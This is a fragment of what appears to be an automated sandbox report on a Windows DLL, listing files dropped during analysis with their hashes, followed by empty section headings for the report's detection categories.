C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vpvcqr5c.u5n.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwgoeqp4.lue.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wuzmjj4s.5no.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhaj02ra.0xw.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\oeprcmty.0.cs	UTF-8 Unicode (with BOM) text	35EAB9A45B1CC09A0099A179AD3DCFE5	42939AC7047BC372300FDD21624100E5C9F83B7F	EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	DDCBEEB82FF764447619CA8F26B79AB0	A052431B053ADEAD13B9423EDD80F4FA10449761	B19AC579456301299E428F81373E8CDEC9B472B46DAB3181DA7036EAFDF344F9
C:\Users\user\AppData\Local\Temp\oeprcmty.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	42FA89466D0BA4E5CE5F3B7D1CE657EF	CF74956879EA24FD0E5E7B83DB67076BC4DB1130	47B05AD37FFC382C93C1A317459F63F21FF3350792C3A75B41F55302C8B095F9
C:\Users\user\AppData\Local\Temp\oeprcmty.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	ACC5E905D76EBE06CB3C38D09CB263C1	EEB3AF5D92BA9D427C85C67331B958E0063B4510	E991673849F98E5A44BA73A54CA47A1C3702F5BC55468B4CEDFE8A294829C473
C:\Users\user\AppData\Local\Temp\oyq1c2cj.0.cs	UTF-8 Unicode (with BOM) text	04CA9F3DD2F71BC69A66232592BD29B7	12724CB97FE30A8B84901648B3653B9AC8FB2F73	DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	CBF10C1AA567D2B82E5C422E0E544DBC	C6E081F904BEC73A1335B50C820B8FC00B26142C	5024F757714C7A4D6EC2DBADB6F5636ABAC0969348C2865AF68CD70538C94EAF
C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	FE9CF2A1075CDE78F99497A0ABFD05F1	E2344F061295060CC6811ECB494E2E28087A9FEF	E4D23FD1D1461CF5C63B24A22D23022117A15B0B7B67245FE3D62BA7B6E0E5B3
C:\Users\user\AppData\Local\Temp\oyq1c2cj.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	877DECC09667FEEF592E3D12599D6BE6	38E9B510CEDFD51647B8E60E108ABD9D5B88A872	D4C965D7B55B61D2E9C2DA9832B765CB6DAB82C25161840C8BC40B1021182DD3
C:\Users\user\AppData\Local\Temp\pqvogmwc.0.cs	UTF-8 Unicode (with BOM) text	35EAB9A45B1CC09A0099A179AD3DCFE5	42939AC7047BC372300FDD21624100E5C9F83B7F	EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	0AED35FFAB0A5CA771393CEE60A13F73	979C1895FA3CBA52E97A565456E3CB7BC5F2881C	BBC0244212BE2929C78131DC34E9FD9A02073ACC1E8E168234983639565942B1
C:\Users\user\AppData\Local\Temp\pqvogmwc.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	ABDFB9F235DA3F5765DF16A0F4C505C5	5AC9B90DB8481105FE57EF9D8034C8107BBCD4FB	6E6742E39EB933CD0FFB0FB7A180BD24CFFD36A3DBF4DEE8860C701374EE2C65
C:\Users\user\AppData\Local\Temp\pqvogmwc.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	F180A3304C942DDE94B3BAC538ECB758	6E79051C6651F1BD7FFD6FACFCD2593FADA77211	6F3C8189552C2FD69069D7310004463AA064222D955826CE28204DFC65B676B8
C:\Users\user\AppData\Local\Temp\pwlcj2cu.0.cs	UTF-8 Unicode (with BOM) text	35EAB9A45B1CC09A0099A179AD3DCFE5	42939AC7047BC372300FDD21624100E5C9F83B7F	EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	5790AEB5F74FB21A80B408FD12A92956	24CD53B4B919829C1B8759DE70332D6C33833B08	AB497F850922DCAA447D61C6DB10B7C506185F853C4A83B57AB6F64FB3AFF3C3
C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	5B6BFEE2D96A3F071B7CDB664124FA24	9CC97AF3855302E9AF7A5CB867C25E63E125777C	A955C358D2C8C39435A3C5F58EAA07D1E33CFDA61C4FC0A861F2EA2579B7EA9C
C:\Users\user\AppData\Local\Temp\pwlcj2cu.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	693350EB45B076BEF7BADC2A56D51D9A	166691AB2DB7AD9CC5D4EEA53978B3449EA2CD1F	AA4A99224C20E8013A706290E2E528CEAC862D6831BB55505FCBBBEB269D56A8
C:\Users\user\AppData\Local\Temp\sjfy431f.0.cs	UTF-8 Unicode (with BOM) text	04CA9F3DD2F71BC69A66232592BD29B7	12724CB97FE30A8B84901648B3653B9AC8FB2F73	DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	0A524C50986168EBADFA5220C99D85B5	957C8AE7E56ED3E31C52C620CA58A536AF663B1E	6A81B937A0148A536367B397563C15616B7CFCC944B0AD7301E5C772877ED3C8
C:\Users\user\AppData\Local\Temp\sjfy431f.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	177880A67897413DB394031830AD03DC	3603A0870B5664FA8883FBEB92CE3C1FD692630B	DB91BB6E6CE210D265DF94791A01837D9D946BA57CCE88807AF9F949BCC77948
C:\Users\user\AppData\Local\Temp\sjfy431f.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	67EB5E2F017A649CC23A1087ADE069B1	1DF9C625CB803F220A526CBA638E49333090188B	BA084FDF251C7820AF14F6C4BA6327476CD3093FDA26E9A30936C96F228E8442
C:\Users\user\AppData\Local\Temp\tpt0a0ul.0.cs	UTF-8 Unicode (with BOM) text	04CA9F3DD2F71BC69A66232592BD29B7	12724CB97FE30A8B84901648B3653B9AC8FB2F73	DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	18A8C0617983F7C6A255C16EBFBFA03F	BE39A447947DA0B70EF6179615B909FDA5531AB1	9589F2B65F8A4B1EB5AB2118C8D597C1EFCFD7D46BBC0A4D71FB14568F4D9D1C
C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	97286B2F7B63EF72C7A3499C675926A4	596B03B70A9D8D9836A9E9016C6FC29E400B9C2C	2689C35999A287EC6A79C036E9BC3E4BCCB301177439A0E28EE1CD3A992A64F6
C:\Users\user\AppData\Local\Temp\tpt0a0ul.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	3B7C745FCB06DAB92F185F316C4D4F8C	FB0758E988C94CBE2D44855EC6277C4D5BCBD93E	73E945B24291C0F86223CF538E212D0B917925464239B852B5BD563FAA346300
C:\Users\user\AppData\Local\Temp\ugg3o5nf.0.cs	UTF-8 Unicode (with BOM) text	04CA9F3DD2F71BC69A66232592BD29B7	12724CB97FE30A8B84901648B3653B9AC8FB2F73	DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	921DA3E9E391C4E51D9B00C93242E112	0492BE02AA73C3074F7D992586E58A4C42A4A7F7	C57416A1C2DA2D8A34B3471166EE2D9AEFF6A15A1C597A3948F49E07AED199E4
C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	5A0894EE2C43BC7C6D64BD8F2C1D338E	2488A63B7FB8C0A75F679D1460AAF47BD70696BE	2F9C20B59F57CE66825E6993FE7FBD62B0B7FF9476F30233035F3A7A63F772DF
C:\Users\user\AppData\Local\Temp\ugg3o5nf.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	5A18C993C7FF50AA27F10C8B0ADE5D05	B5B05B6405F4A87A87DA79956725DF8EACDFC1B4	0BF337B488EAFDDAE024DB4ABFAEED1D133411463FA5367EDE729B65E69215AC
C:\Users\user\Documents\20220126\PowerShell_transcript.124406.aljG3MvD.20220126102824.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	0880C2B69E83763B63FAC27CD40DE7B4	5DB053C3F830A58AEE807E20D631D4B33004D879	AFC6DC0233C2F1B344CF9EBA1DB4717EA073C8ADE024BB6F126DD04EC63D5142
C:\Users\user\Documents\20220126\PowerShell_transcript.124406.bcfkRUYJ.20220126102824.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	C0AA34F71A7B9399B941D17203D4104F	C20FF7A8FE481FDF01BD50D47B99CFC884F568B6	2B54331C3F4EF85922D9E264DC1B959576441774C61ED5FA768703CB781AF43B

Windows Analysis Report 61f113091fd0c.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted URLs

Windows Analysis Report
61f113091fd0c.dll